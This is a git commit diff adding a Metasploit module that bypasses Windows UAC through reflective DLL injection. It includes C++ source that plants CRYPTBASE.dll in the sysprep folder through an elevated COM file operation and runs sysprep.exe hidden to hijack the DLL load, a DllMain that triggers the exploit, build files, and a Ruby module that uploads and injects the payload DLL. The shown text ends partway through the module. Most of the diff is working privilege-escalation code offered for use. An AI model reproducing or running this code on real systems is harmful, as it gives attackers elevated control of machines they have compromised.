Land #2431 - In-memory bypass uac

external/source/exploits/bypassuac_injection/.gitignore

@@ -0,0 +1,151 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+App_Data/*.mdf
+App_Data/*.ldf
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Mac crap
+.DS_Store

external/source/exploits/bypassuac_injection/bypassuac_injection.sln

@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypassuac", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

external/source/exploits/bypassuac_injection/dll/reflective_dll.vcxproj

@@ -0,0 +1,204 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
+    <RootNamespace>reflective_dll</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectName>bypassuac</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)-x86</TargetName>
+    <IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)-x64</TargetName>
+    <IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>
+IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
+    mkdir "..\..\..\..\..\data\post\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <CompileAs>CompileAsCpp</CompileAs>
+    </ClCompile>
+    <Link>
+      <OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>
+IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
+    mkdir "..\..\..\..\..\data\post\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="src\Exploit.cpp" />
+    <ClCompile Include="src\ReflectiveDll.c" />
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\Exploit.h" />
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp

@@ -0,0 +1,119 @@
+#include "Exploit.h"
+
+void exploit()
+{
+
+	const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
+	const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
+	const wchar_t *sySysPrepExe = L"sysprep.exe";
+	const wchar_t *szElevDll = L"CRYPTBASE.dll";
+	const wchar_t *szSourceDll = L"CRYPTBASE.dll";
+	wchar_t szElevDir[MAX_PATH] = {};
+	wchar_t szElevDir_syswow64[MAX_PATH] = {};
+	wchar_t szElevDllFull[MAX_PATH] = {};
+	wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
+	wchar_t szElevExeFull[MAX_PATH] = {};
+	wchar_t path[MAX_PATH] = {};
+	wchar_t windir[MAX_PATH] = {};
+	const wchar_t *szElevArgs = L"";
+	const wchar_t  *szEIFOMoniker = NULL;
+	PVOID OldValue = NULL;
+
+	IFileOperation *pFileOp = NULL;
+	IShellItem *pSHISource = 0;
+	IShellItem *pSHIDestination = 0;
+	IShellItem *pSHIDelete = 0;
+
+	const IID *pIID_EIFO = &__uuidof(IFileOperation);
+	const IID *pIID_EIFOClass = &__uuidof(FileOperation);
+	const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
+
+	GetWindowsDirectoryW(windir, MAX_PATH);
+	GetTempPathW(MAX_PATH, path);
+
+	/* %temp%\cryptbase.dll */
+	wcscat_s(path, MAX_PATH, szSourceDll);
+	
+	/* %windir%\System32\sysprep\ */
+	wcscat_s(szElevDir, MAX_PATH, windir);
+	wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
+
+	/* %windir%\sysnative\sysprep\ */
+	wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
+	wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
+
+	/* %windir\system32\sysprep\cryptbase.dll */
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
+
+	/* %windir\sysnative\sysprep\cryptbase.dll */
+	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
+	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
+
+	/* %windir%\system32\sysprep\sysprep.exe */
+	wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
+
+	if (CoInitialize(NULL) == S_OK)
+	{	
+		if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
+		{
+			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
+			{
+				if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
+				{
+					if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
+					{
+						if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
+						{
+							/* Copy the DLL file to the sysprep folder*/
+							if (pFileOp->PerformOperations() == S_OK)
+							{
+								/* Execute sysprep.exe */
+								SHELLEXECUTEINFOW shinfo;
+								ZeroMemory(&shinfo, sizeof(shinfo));
+								shinfo.cbSize = sizeof(shinfo);
+								shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+								shinfo.lpFile = szElevExeFull;
+								shinfo.lpParameters = szElevArgs;
+								shinfo.lpDirectory = szElevDir;
+								shinfo.nShow = SW_HIDE;
+
+								Wow64DisableWow64FsRedirection(&OldValue);
+								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
+								{
+									WaitForSingleObject(shinfo.hProcess, 10000);
+									CloseHandle(shinfo.hProcess);
+								}
+
+								if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
+								{
+									if (0 != pSHIDelete)
+									{
+										if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
+										{
+                      pFileOp->PerformOperations();
+											// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
+											// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
+											// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
+											if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
+											{
+												if (0 != pSHIDelete)
+												{
+													if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
+													{
+														pFileOp->PerformOperations();
+													}
+												}
+											}
+										}
+									}
+								}
+							}
+						}
+					}
+				}
+			}
+		}
+	}
+}

external/source/exploits/bypassuac_injection/dll/src/Exploit.h

@@ -0,0 +1,8 @@
+#include <Windows.h>
+#include <commctrl.h>
+#include <shlobj.h>
+#include <Shellapi.h>
+#include <stdio.h>
+#include <guiddef.h>
+
+EXTERN_C void exploit();

external/source/exploits/bypassuac_injection/dll/src/ReflectiveDll.c

@@ -0,0 +1,26 @@
+#include "ReflectiveLoader.h"
+#include "Exploit.h"
+
+extern HINSTANCE hAppInstance;
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+{
+    BOOL bReturnValue = TRUE;
+	switch( dwReason ) 
+    { 
+		case DLL_QUERY_HMODULE:
+			if( lpReserved != NULL )
+				*(HMODULE *)lpReserved = hAppInstance;
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			exploit();
+			ExitProcess(0);
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+            break;
+    }
+	return bReturnValue;
+}

external/source/exploits/bypassuac_injection/make.bat

@@ -0,0 +1,38 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X86" GOTO BUILD_X86
+IF "%1"=="x64" GOTO BUILD_X64
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building Exploits x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X86
+ECHO "Building Exploits x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building Exploits x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+ECHO "Building Bypass UAC Injection"
+msbuild.exe make.msbuild /target:%PLAT%
+
+
+FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
+SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
+echo Finished %ldt%
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END

external/source/exploits/bypassuac_injection/make.msbuild

@@ -0,0 +1,19 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\bypassuac_injection.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86;x64" />
+
+  <Target Name="x86">
+    <Message Text="Building Bypass UAC (Injection) Release version x86" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="Building Bypass UAC (Injection) Release version x64" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+  </Target>
+</Project>
+

external/source/exploits/make.bat

@@ -52,6 +52,13 @@ IF "%ERRORLEVEL%"=="0" (
   PUSHD bypassuac
   msbuild.exe make.msbuild /target:%PLAT%
   POPD
+)
+
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building bypassuac (in-memory)"
+  PUSHD bypassuac_injection
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
 )
 
 FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j

lib/msf/core/post/windows.rb

@@ -16,4 +16,5 @@ module Msf::Post::Windows
   require 'msf/core/post/windows/shadowcopy'
   require 'msf/core/post/windows/user_profiles'
   require 'msf/core/post/windows/ldap'
+  require 'msf/core/post/windows/reflective_dll_injection'
 end

lib/msf/util/exe.rb

@@ -422,6 +422,17 @@ require 'msf/core/exe/segment_injector'
     if opts[:exe_type] == :dll
       mt = pe.index('MUTEX!!!')
       pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+
+      if opts[:dll_exitprocess]
+        exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
+        exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
+        et_index =  pe.index(exit_thread)
+        if et_index
+          pe[et_index,exit_process.length] = exit_process
+        else
+          raise RuntimeError, "Unable to find and replace ExitThread in the DLL."
+        end
+      end
     end
 
     return pe

modules/exploits/windows/local/bypassuac_injection.rb

@@ -0,0 +1,233 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (In Memory Injection)',
+      'Description'   => %q{
+        This module will bypass Windows UAC by utilizing the trusted publisher
+        certificate through process injection. It will spawn a second shell that
+        has the UAC flag turned off. This module uses the Reflective DLL Injection
+        technique to drop only the DLL payload binary instead of three seperate
+        binaries in the standard technique. However, it requires the correct
+        architecture to be selected, (use x64 for SYSWOW64 systems also).
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
+          'mitnick',
+          'mubix', # Port to local exploit
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk' # In memory technique
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [
+          'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/',
+          'URL', 'http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html'
+        ]
+      ],
+      'DisclosureDate'=> "Dec 31 2010"
+    ))
+
+  end
+
+  def bypass_dll_path
+    # path to the bypassuac binary
+    path = ::File.join(Msf::Config.data_directory, "post")
+
+    # decide, x86 or x64
+    sysarch = sysinfo["Architecture"]
+    if sysarch =~ /x64/i
+      unless(target_arch.first =~ /64/i) and (payload_instance.arch.first =~ /64/i)
+        fail_with(
+            Exploit::Failure::BadConfig,
+            "x86 Target Selected for x64 System"
+        )
+      end
+
+      if sysarch =~ /WOW64/i
+        return ::File.join(path, "bypassuac-x86.dll")
+      else
+        return ::File.join(path, "bypassuac-x64.dll")
+      end
+    else
+      if (target_arch.first =~ /64/i) or (payload_instance.arch.first =~ /64/i)
+        fail_with(
+            Exploit::Failure::BadConfig,
+            "x64 Target Selected for x86 System"
+        )
+      end
+
+      ::File.join(path, "bypassuac-x86.dll")
+    end
+  end
+
+
+
+  def check_permissions!
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
+    end
+  end
+
+
+
+  def exploit
+    validate_environment!
+
+    case get_uac_level
+      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+        fail_with(Exploit::Failure::NotVulnerable,
+                  "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
+        )
+      when UAC_DEFAULT
+        print_good "UAC is set to Default"
+        print_good "BypassUAC can bypass this setting, continuing..."
+      when UAC_NO_PROMPT
+        print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
+        runas_method
+        return
+    end
+
+    check_permissions!
+
+    @temp_path = expand_path('%TEMP%').strip
+
+    upload_payload_dll!
+
+    pid = spawn_inject_proc
+
+    run_injection(pid, bypass_dll_path)
+
+    # delete the uac bypass payload
+    vprint_status("Cleaning up payload file...")
+    file_rm(payload_filepath)
+  end
+
+
+  def payload_filepath
+    "#{@temp_path}\\CRYPTBASE.dll"
+  end
+
+
+
+  def runas_method
+    payload = generate_payload_exe
+    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tmpdir = expand_path("%TEMP%")
+    tempexe = tmpdir + "\\" + payload_filename
+    write_file(tempexe, payload)
+    print_status("Uploading payload: #{tempexe}")
